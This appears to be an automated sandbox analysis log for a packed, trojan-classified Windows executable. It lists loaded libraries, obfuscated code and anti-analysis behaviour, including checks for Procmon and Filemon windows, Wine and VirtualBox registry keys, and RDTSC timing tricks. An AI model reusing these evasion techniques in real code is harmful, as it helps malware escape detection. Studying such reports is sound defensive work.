              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A60EB0_2_009A60EB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007248B00_2_007248B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099B1610_2_0099B161
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC42DF0_2_00AC42DF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABA3AF0_2_00ABA3AF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB1BE90_2_00AB1BE9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABF3120_2_00ABF312
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB6D9B0_2_00AB6D9B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABBD2A0_2_00ABBD2A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A8EB60_2_009A8EB6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB36CC0_2_00AB36CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA1E050_2_00AA1E05
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A446690_2_00A44669
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C57920_2_009C5792
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABD7860_2_00ABD786
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A8A7440_2_00A8A744
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00704A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: bdmyinmd ZLIB complexity 0.9949113333958021
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00723A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00723A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_0071CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\VG4CUKNC.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeVirustotal: Detection: 50%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1813504 > 1048576
              Source: file.exeStatic PE information: Raw size of bdmyinmd is bigger than: 0x100000 < 0x1a0e00

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.700000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bdmyinmd:EW;opbnouzp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bdmyinmd:EW;opbnouzp:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00726390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00726390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1c741d should be: 0x1bd421
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: bdmyinmd
              Source: file.exeStatic PE information: section name: opbnouzp
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push edx; mov dword ptr [esp], esi0_2_00AB88AD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push ebp; mov dword ptr [esp], eax0_2_00AB88E8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 746344DFh; mov dword ptr [esp], edx0_2_00AB8929
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push esi; mov dword ptr [esp], edi0_2_00AB8952
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push edi; mov dword ptr [esp], 78648C60h0_2_00AB89CE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 61BA8222h; mov dword ptr [esp], ebp0_2_00AB89DD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 7D7324DEh; mov dword ptr [esp], esi0_2_00AB8A06
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 470594B5h; mov dword ptr [esp], edx0_2_00AB8A1B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 262AE7DBh; mov dword ptr [esp], edx0_2_00AB8A45
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push edi; mov dword ptr [esp], ecx0_2_00AB8AD5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 1A13BCD6h; mov dword ptr [esp], eax0_2_00AB8B1A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push ecx; mov dword ptr [esp], edx0_2_00AB8BCD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 1EDD6F39h; mov dword ptr [esp], ebx0_2_00AB8C32
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push ebx; mov dword ptr [esp], eax0_2_00AB8C90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push ebx; mov dword ptr [esp], edi0_2_00AB8CF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 7632A820h; mov dword ptr [esp], edi0_2_00AB8D02
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 68619282h; mov dword ptr [esp], ecx0_2_00AB8D67
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 5AC2F222h; mov dword ptr [esp], edx0_2_00AB8DBE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 6BC72B71h; mov dword ptr [esp], ebp0_2_00AB8E58
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 1D656F85h; mov dword ptr [esp], edx0_2_00AB8EF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push edi; mov dword ptr [esp], ecx0_2_00AB8F71
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push eax; mov dword ptr [esp], 7CBFB139h0_2_00AB8FD9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 4B92B0C1h; mov dword ptr [esp], ebx0_2_00AB9048
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push ebx; mov dword ptr [esp], ebp0_2_00AB909C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 30D762E8h; mov dword ptr [esp], eax0_2_00AB90C3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push ebp; mov dword ptr [esp], ecx0_2_00AB910D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 2E6E2ED2h; mov dword ptr [esp], eax0_2_00AB9132
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push edx; mov dword ptr [esp], ecx0_2_00AB9189
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push ebp; mov dword ptr [esp], edx0_2_00AB919D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push edx; mov dword ptr [esp], 253C3860h0_2_00AB9209
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB88A3 push 5F6DC222h; mov dword ptr [esp], edx0_2_00AB9246
              Source: file.exeStatic PE information: section name: bdmyinmd entropy: 7.954445428928977

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00726390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00726390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26171
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9500D5 second address: 9500D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9500D9 second address: 9500E6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FABF0F31B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9500E6 second address: 94F9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 pushad 0x00000008 mov esi, 4967D825h 0x0000000d clc 0x0000000e popad 0x0000000f push dword ptr [ebp+122D0B5Dh] 0x00000015 cld 0x00000016 call dword ptr [ebp+122D1C4Dh] 0x0000001c pushad 0x0000001d mov dword ptr [ebp+122D1AC1h], edx 0x00000023 xor eax, eax 0x00000025 clc 0x00000026 mov edx, dword ptr [esp+28h] 0x0000002a jmp 00007FABF0D68605h 0x0000002f mov dword ptr [ebp+122D2AB4h], eax 0x00000035 jmp 00007FABF0D68601h 0x0000003a or dword ptr [ebp+122D3526h], esi 0x00000040 mov esi, 0000003Ch 0x00000045 jmp 00007FABF0D68609h 0x0000004a pushad 0x0000004b js 00007FABF0D685F6h 0x00000051 mov edi, dword ptr [ebp+122D2B2Ch] 0x00000057 popad 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c clc 0x0000005d lodsw 0x0000005f cmc 0x00000060 add eax, dword ptr [esp+24h] 0x00000064 pushad 0x00000065 and ecx, 4CFF9D48h 0x0000006b jbe 00007FABF0D685F7h 0x00000071 clc 0x00000072 popad 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 jnp 00007FABF0D68602h 0x0000007d js 00007FABF0D685FCh 0x00000083 jng 00007FABF0D685F6h 0x00000089 nop 0x0000008a push eax 0x0000008b push edx 0x0000008c jns 00007FABF0D68601h 0x00000092 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94F9A8 second address: 94F9B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FABF0F31B46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94F9B2 second address: 94F9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAB86 second address: ACAB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jp 00007FABF0F31B46h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAB93 second address: ACABC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FABF0D68606h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push edi 0x0000001c pop edi 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACABC3 second address: ACABDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B51h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACABDA second address: ACABE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9C7B second address: AC9CB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FABF0F31B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FABF0F31B4Eh 0x00000012 pop eax 0x00000013 pop ebx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FABF0F31B56h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9CB3 second address: AC9CCE instructions: 0x00000000 rdtsc 0x00000002 jng 00007FABF0D685F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007FABF0D685FAh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9CCE second address: AC9CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9CD6 second address: AC9CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9E56 second address: AC9E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FABF0F31B46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA13D second address: ACA143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA143 second address: ACA149 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA2C7 second address: ACA2CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACA2CB second address: ACA2DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FABF0F31B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jno 00007FABF0F31B46h 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD2FC second address: ACD302 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD302 second address: ACD38D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jne 00007FABF0F31B46h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov edx, dword ptr [ebp+122D2A18h] 0x00000017 push 00000000h 0x00000019 mov ecx, 1F9FDDFDh 0x0000001e jmp 00007FABF0F31B54h 0x00000023 call 00007FABF0F31B49h 0x00000028 je 00007FABF0F31B54h 0x0000002e push eax 0x0000002f jmp 00007FABF0F31B54h 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 pushad 0x00000039 js 00007FABF0F31B48h 0x0000003f pushad 0x00000040 popad 0x00000041 push ecx 0x00000042 jmp 00007FABF0F31B50h 0x00000047 pop ecx 0x00000048 popad 0x00000049 mov eax, dword ptr [eax] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD38D second address: ACD392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD392 second address: ACD3AB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnl 00007FABF0F31B46h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jc 00007FABF0F31B4Eh 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD453 second address: ACD458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD458 second address: ACD45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD45E second address: ACD4C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c jnp 00007FABF0D685F9h 0x00000012 movzx edi, ax 0x00000015 call 00007FABF0D685F9h 0x0000001a push ebx 0x0000001b pushad 0x0000001c jno 00007FABF0D685F6h 0x00000022 jmp 00007FABF0D685FFh 0x00000027 popad 0x00000028 pop ebx 0x00000029 push eax 0x0000002a jmp 00007FABF0D68606h 0x0000002f mov eax, dword ptr [esp+04h] 0x00000033 js 00007FABF0D68602h 0x00000039 jng 00007FABF0D685FCh 0x0000003f mov eax, dword ptr [eax] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD4C9 second address: ACD4D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0F31B4Bh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF86E second address: ADF878 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FABF0D685FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB9D0 second address: AEB9D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB9D6 second address: AEB9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEBB23 second address: AEBB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FABF0F31B5Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEBCB5 second address: AEBCB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEBCB9 second address: AEBCBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEC09E second address: AEC0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEC0A4 second address: AEC0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEC0AA second address: AEC0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FABF0D68609h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FABF0D68609h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FABF0D68602h 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEC0FA second address: AEC107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 js 00007FABF0F31B46h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEC21E second address: AEC224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEC522 second address: AEC528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEC800 second address: AEC815 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABF0D685FFh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEC815 second address: AEC819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEC819 second address: AEC827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FABF0D68602h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEC827 second address: AEC82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1229 second address: AE124F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0D68606h 0x00000007 jnc 00007FABF0D685F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE124F second address: AE1253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1253 second address: AE125F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADF12 second address: AADF19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED239 second address: AED23E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED65A second address: AED65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED65E second address: AED668 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FABF0D685F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED668 second address: AED6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jne 00007FABF0F31B46h 0x0000000d pop ebx 0x0000000e pushad 0x0000000f push edi 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e jmp 00007FABF0F31B56h 0x00000023 push esi 0x00000024 pop esi 0x00000025 popad 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF076C second address: AF0789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FABF0D685F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FABF0D68601h 0x00000011 rdtsc
